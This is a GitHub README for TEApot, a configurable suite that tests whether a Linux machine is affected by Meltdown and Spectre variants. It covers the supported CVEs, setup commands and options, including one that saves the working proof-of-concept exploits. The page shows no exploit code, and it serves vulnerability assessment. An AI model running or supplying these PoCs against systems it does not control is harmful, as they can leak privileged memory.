- Notifications
You must be signed in to change notification settings - Fork0
TEApot(Transient Execution Attack pot) is a project used to evaluate whether your system is affected by Meltdown and Spectre. My goal is to build a easy-to-use(hard to implement) and configurable transient attack test suite.
License
github-3rr0r/TEApot
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
TEApot(Transient Execution Attack pot) is a project used to evaluate whether your system is affected by Meltdown and Spectre. My goal is to build a easy-to-use(hard to implement) and configurable transient attack test suite.
This project is mainly based on projectTransient Fail developed byIAIK. More information will be found on their paperA Systematic Evaluation of Transient Execution Attacks and Defenses.
Linux with gcc and other dependent libraries.
Developed on 5.4.0-47-generic #51~18.04.1-Ubuntu.
x86 and arm64 are supported.
Meltdown-like and Spectre-like vulnerabilities, more information will be also found on paperA Systematic Evaluation of Transient Execution Attacks and Defenses.
This vulnerablities are supported:
| Systematic type name | CVE | Description |
|---|---|---|
| Meltdown_AC | - | - |
| Meltdown_BR | - | - |
| Meltdown_DE | - | - |
| Meltdown_GP | CVE-2018-3640 | Spectre V3a, rogue system register read |
| Meltdown_NM | CVE-2018-3665 | Lazy FP |
| Meltdown_P | CVE-2018-3615/CVE-2018-3620/CVE-2018-3646 | Foreshadow, L1 terminal fault |
| Meltdown_PK | - | - |
| Meltdown_RW | Spectre V1.2, write to page with read-only flag | |
| Meltdown_SS | - | - |
| Meltdown_UD | - | - |
| Meltdown_US | CVE-2017-5754 | Meltdown, rogue data cache load |
| Spectre_BTB | CVE-2017-5715 | Spectre V2, branch target injection |
| Spectre_PHT | CVE-2017-5753 | Spectre V1, bounds check bypass |
| Spectre_RSB | - | - |
| Spectre_STL | CVE-2018-3693/CVE-2018-3639 | Spectre V1.1, NG and V4, speculative store bypass |
This test suite allows you to select the vulnerabilities with option "-v".
Default option is "all" for testing all vulnerabilities.
You can enable and specify a markdown file as output of valid PoCs with option "-o"
You can show simple supported vulnerablities options with option "-s"
You can use option "-m" in test mode, simple result output will be available.
0 means vulnerable, 1 means not vulnerable, other values mean error or not tested.
You can use option "-h" to show all help messages or read the last part of this document.
lib: Global libraries;libcache: Cache operation libraries;libpte:PTEditor developed by Michael Schwarz that allows manipulation of paging structures via a Linux kernel module;meltdown: PoC of Meltdown-like vulnerabilities;spectre: PoC of Spectre-like vulnerabilities;Makefile: Makefile of this test suite;run.sh: Main entry of this test suite;README.md: The file you are reading!
- Some preparation
sudo apt-get install libelf-dev build-essential pkg-config bison flex libssl-dev libelf-dev bcsudo apt-get purge libc6-devsudo apt-get install libc6-devsudo apt-get install libc6-dev-i386sudo apt-get install build-essentialsudo apt-get install seccompsudo apt-get install libseccomp-devsudo apt-get install zsh
- Clone this repository
git clone https://github.com/Mashiro1995/TEApot.git
- Make
make
- Grant execution permissions and run!
chmod +x run.sh./run.sh# notice that you need input your password for kernel operation during this test- Run options
Test mode : run.sh [-options]Generation mode : run.sh [-options] -g [output-path]Test all vulnerablities : run.sh [-o filename] [-m]Test specific vulnerablities : run.sh [-v "list of vulnerablities"] [-o filename] [-m]Show usage : run.sh -hShow supported vulnerablities: run.sh -l [-m]Auto mode will test all vulnerablities covered in this test suite.In manual mode, you can specify vulnerablities to be tested with options -v and followed by a list of vulnerablities.-g generation mode, specific path to save specific PoCs-o enable and specify a markdown file as output of valid PoCs-v list of vulnerablities to be tested. If not specified, all vuls will be test-h show usage-l show supported vulnerablities-s show simple supported vulnerablities options-t specific timeout time, default 120s-m used in test mode, simple result output will be available. 0 means vulnerable, 1 means not vulnerable, other values mean error or not tested.You can select combination of vulnerabilities with following inputs:
| Options | Vulnerabilities to be tested |
|---|---|
| all | All vulnerabilities |
| meltdown | All Meltdown vulnerabilities |
| spectre | All Spectre vulnerabilities |
| spectre_btb | All Spectre_BTB vulnerabilities |
| spectre_pht | All Spectre_PHT vulnerabilities |
| spectre_rsb | All Spectre_RSB vulnerabilities |
You can also use multi_parameters to select specific vulnerabilities and separate them with spaces:
| Options | Vulnerabilities to be tested | Options | Vulnerabilities to be tested |
|---|---|---|---|
| ac | Meltdown_AC | btb_sa_ip | Spectre_BTB_sa_ip |
| br | Meltdown_BR | btb_sa_oop | Spectre_BTB_sa_oop |
| de | Meltdown_DE | btb_ca_ip | Spectre_BTB_ca_ip |
| gp | Meltdown_GP | btb_ca_oop | Spectre_BTB_ca_oop |
| nm | Meltdown_NM | pht_sa_ip | Spectre_PHT_sa_ip |
| p | Meltdown_P | pht_sa_oop | Spectre_PHT_sa_oop |
| pk | Meltdown_PK | pht_ca_ip | Spectre_PHT_ca_ip |
| rw | Meltdown_RW | pht_ca_oop | Spectre_PHT_ca_oop |
| ss | Meltdown_SS | rsb_sa_ip | Spectre_RSB_sa_ip |
| ud | Meltdown_UD | rsb_sa_oop | Spectre_RSB_sa_oop |
| us | Meltdown_US | rsb_ca_ip | Spectre_RSB_ca_ip |
| rsb_ca_oop | Spectre_RSB_ca_oop | ||
| stl | Spectre_STL |
Examples:
# Examples:run.sh# Test all vulnerabilities.run.sh -m# Test all vulnerabilities and save simple result to result.txt.run.sh -v"meltdown spectre_btb" -o codes# Test all Meltdown and all Spectre_BTB type vulnerabilities, and save successful PoCs to path "codes".run.sh -v"meltdown spectre_btb" -o codes -m# Test all Meltdown and all Spectre_BTB type vulnerabilities, save simple result to result.txt, and successful PoCs to path "codes".run.sh -v"meltdown spectre_btb" -g codes# PoCs of Meltdown and all Spectre_BTB type vulnerabilities will be saved to path "codes" with out test.
About
TEApot(Transient Execution Attack pot) is a project used to evaluate whether your system is affected by Meltdown and Spectre. My goal is to build a easy-to-use(hard to implement) and configurable transient attack test suite.